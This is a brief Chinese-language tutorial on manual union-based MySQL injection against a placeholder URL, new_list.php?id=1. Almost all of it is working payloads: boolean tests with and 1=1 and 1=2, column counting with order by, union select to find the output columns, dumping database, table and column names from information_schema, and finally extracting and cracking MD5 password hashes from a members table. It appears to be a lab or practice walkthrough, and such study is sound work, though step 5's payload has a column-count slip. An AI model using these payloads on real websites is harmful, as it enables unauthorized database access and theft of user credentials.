该文章讲解mysql注入的思路。没有对关键字进行过滤的情况。
1.判断是否存在注入,and 1=1 没报错 1=2 错误 说明有注入点
http://xxxx.com/new_list.php?id=1 and 1=1
http://xxxx.com/new_list.php?id=1 and 1=2
2.获取字段列,判断几列 order by 4 没报错 说明有4列
http://xxxx.com/new_list.php?id=1 order by 1#
http://xxxx.com/new_list.php?id=1 order by 2#
http://xxxx.com/new_list.php?id=1 order by 3#
http://xxxx.com/new_list.php?id=1 order by 4#
http://xxxx.com/new_list.php?id=1 order by 5# 不正常,说明有四个字段
3.联合查询
http://xxxx.com/new_list.php?id=1 and 1=2 union select 1,2,3,4#看参数显示位置
4.爆破库名
http://xxxx.com/new_list.php?id=1 and 1=2 union select 1,schema_name,3,4 from information_schema.schemata limit 0,1
5.爆破表名
http://xxxx.com/new_list.php?id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
6.爆破列名
http://xxxx.com/new_list.php?id=1 and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'
7.得到md5加密的密码,然后解密即可